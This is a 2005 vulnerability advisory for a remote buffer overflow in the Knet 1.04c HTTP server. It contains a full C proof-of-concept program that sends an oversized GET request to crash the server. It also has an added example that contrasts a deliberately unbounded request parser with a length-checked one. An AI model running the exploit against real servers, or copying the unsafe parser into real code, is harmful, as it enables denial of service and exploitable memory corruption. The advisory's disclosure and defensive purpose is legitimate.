
| Subject: | Knet <= 1.04c Buffer Overflow Bug |
|---|---|
| Date: | Fri, 25 Feb 2005 23:37:24 +0100 |
-=[--------------------ADVISORY-------------------]=-
-=[ ]=-
-=[ Knet <= 1.04c ]=-
-=[ ]=-
-=[ Author: CorryL [corryl80@gmail.com] ]=-
-=[ x0n3-h4ck.org ]=-
-=[-----------------------------------------------------]=-
-=[+] Application: Knet
-=[+] Version: 1.04c
-=[+] Vendor's URL: www.stormystudios.com
-=[+] Platform: Windows
-=[+] Bug type: Buffer overflow
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ CorryL[at]gmail[dot]com ~
-=[+] Reference: www.x0n3-h4ck.org
..::[ Description ]::..
Knet is a small HTTP server, easy to install and use.
..::[ Bug ]::..
This software is affected by a buffer overflow.
A malicious attacker sending the request GET AAAAAA..... 522 bytes long
overwrites the EIP register, causing the execution of
malicious code.
..::[ Proof Of Concept ]::..
GET AAAAAAAAAAAAAAAAAAAAAAAAAA......... 522 bytes long
..::[ Exploit ]::..
```c
/*
KNet <= 1.04c is affected by a remote buffer overflow in the GET command.
This PoC demonstrates the vulnerability.
KNet <= 1.04c PoC Denial Of Service Coded by: Expanders
Usage: ./x0n3-h4ck_Knet-DoS.c <Host> <Port>
*/
#include <stdio.h>
#include <stdlib.h>      /* malloc, free, exit, atoi */
#include <string.h>
#include <unistd.h>      /* close */
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void help(char *program_name);

int main(int argc, char *argv[]) {
    struct sockaddr_in trg;
    struct hostent *he;
    int sockfd, rc;
    char evilbuf[1024];
    char *request;

    if (argc < 3) {
        help(argv[0]);
        exit(0);
    }
    printf("\n\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\n");

    /* Resolve the target; gethostbyname() returns NULL on failure. */
    he = gethostbyname(argv[1]);
    if (he == NULL) {
        printf("[Fail] -> Unable to resolve %s\n\n", argv[1]);
        return 1;
    }
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror("socket");
        return 1;
    }
    request = (char *) malloc(12344);
    if (request == NULL) {
        perror("malloc");
        close(sockfd);
        return 1;
    }
    trg.sin_family = AF_INET;
    trg.sin_port = htons(atoi(argv[2]));
    trg.sin_addr = *((struct in_addr *) he->h_addr);
    memset(&(trg.sin_zero), '\0', 8);

    printf("\n\nConnecting to target \t...");
    rc = connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
    if (rc == 0) {
        printf("[Done]\nBuilding evil buffer\t...");
        /* 1023 bytes of 'Z' (0x5A), NUL-terminated so %s below stops at the end. */
        memset(evilbuf, 90, 1023);
        evilbuf[1023] = '\0';
        printf("[Done]\nSending evil request \t...");
        /* Oversized GET path, well past the 522 bytes the advisory reports. */
        sprintf(request, "GET %s \n\r\n\r", evilbuf);
        send(sockfd, request, strlen(request), 0);
        printf("[Done]\n\n[Finished] Check the server now\n");
    } else {
        printf("[Fail] -> Unable to connect\n\n");
    }
    free(request);
    close(sockfd);
    return 0;
}

void help(char *program_name) {
    printf("\n\t-=[ KNet <= 1.04b PoC Denial Of Service ]=-\n");
    printf("\t-=[ ]=-\n");
    printf("\t-=[ Coded by Expanders -/www.x0n3-h4ck.org\\- ]=-\n\n");
    printf("Usage: %s <Host> <Port>\n", program_name);
}
```
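The defect class the Bug section describes, as an added example that is not Knet's source and not part of the original advisory: a request-line handler that copies the GET path into a fixed stack array with no length check, beside a hardened version that measures the path first and answers 414 for anything that does not fit. PATH_CAP, the function names and the constructed 522-byte request are assumptions.

```c
#include <stdio.h>
#include <string.h>

enum { REQ_OK = 200, REQ_BAD = 400, REQ_TOO_LONG = 414 };
#define PATH_CAP 256   /* hypothetical fixed path buffer; Knet's real size is not on the page */

/* The defect class behind the advisory: the path is copied into a fixed array
 * with no length check, so an over-long GET runs past it into the saved return
 * address. Contrast only; never call on untrusted input. Not Knet's source. */
int parse_request_line_unsafe(const char *line, char *path /* PATH_CAP bytes */)
{
    char method[8];
    return sscanf(line, "%7s %s", method, path) == 2 ? REQ_OK : REQ_BAD;
}

/* Hardened version: measure the path first and refuse anything that does not
 * fit, answering 414 instead of writing past the buffer. */
int parse_request_line(const char *line, char *path, size_t path_cap)
{
    if (strncmp(line, "GET ", 4) != 0) return REQ_BAD;
    const char *p = line + 4;
    size_t n = strcspn(p, " \r\n");   /* path ends at SP or CRLF */
    if (n == 0) return REQ_BAD;
    if (n >= path_cap)                /* no room for path + NUL */
        return REQ_TOO_LONG;
    memcpy(path, p, n);
    path[n] = '\0';
    return REQ_OK;
}

/* Verdict only, using a PATH_CAP-sized buffer as a real handler would. */
int request_line_status(const char *line)
{
    char path[PATH_CAP];
    return parse_request_line(line, path, sizeof path);
}

/* Constructed input: "GET " + path_len 'A's + " HTTP/1.0\r\n", mirroring the
 * advisory's 522-byte proof of concept. Returns the parser's verdict. */
int status_for_path_len(size_t path_len)
{
    char line[1100];
    if (path_len + 16 > sizeof line)
        return -1;
    memcpy(line, "GET ", 4);
    memset(line + 4, 'A', path_len);
    memcpy(line + 4 + path_len, " HTTP/1.0\r\n", 12);   /* 11 chars + NUL */
    return request_line_status(line);
}
```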
..::[ Workaround ]::..
Waiting for an official patch
..::[ Disclosure Timeline ]::..
[17/02/2005] - Vendor notification
[17/02/2005] - Vendor response
[25/02/2005] - No patch released by vendor
[25/02/2005] - Public disclosure